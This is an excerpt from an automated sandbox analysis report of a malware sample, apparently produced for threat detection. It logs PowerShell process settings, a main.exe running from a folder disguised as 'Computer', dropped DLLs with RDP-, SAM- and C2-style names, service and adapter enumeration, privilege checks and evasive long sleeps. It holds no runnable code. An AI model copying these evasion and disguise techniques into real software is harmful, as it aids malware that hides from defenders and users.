Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Code function: GetLastError,EnumServicesStatusExA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,strlen,strlen,GetProcessHeap,HeapAlloc,strcpy,

23_2_00007FFE0E167694

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE0E136078
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE0E16B648
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE0EB42738
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE11EC4928
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE126D1D98
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Code function: GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetAdaptersInfo,	23_2_00007FFE13383058

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4254	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5590	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8787	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7077	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2542	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Window / User API: threadDelayed 2798
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Window / User API: threadDelayed 5419

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\kInii6kX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\9qaNW6z6	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\Jcf8nu5c	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\j8fz8FfX	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\HwfABz7s	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\TLN3Eh0f	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\zFE1sfMY	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\zCUeqzwC	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	Jump to dropped file
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	Dropped PE file which has not been started: C:\Windows\Temp\DYoNFfUY	Jump to dropped file

Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_23-60333

Source: C:\Users\user\AppData\Local\Temp\3lp16vmh8u8y3z1y6.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-11349

Source: C:\Users\user\Desktop\file.exe TID: 6744	Thread sleep time: -25920000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5824	Thread sleep count: 4254 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724	Thread sleep count: 5590 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2520	Thread sleep count: 8787 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2188	Thread sleep count: 308 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7068	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7128	Thread sleep count: 7077 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476	Thread sleep count: 2542 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2640	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5180	Thread sleep count: 211 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 5180	Thread sleep time: -105500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 4960	Thread sleep count: 203 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 4960	Thread sleep time: -101500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 4588	Thread sleep count: 50 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512	Thread sleep count: 2798 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512	Thread sleep time: -8394000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 3512	Thread sleep count: 5419 > 30
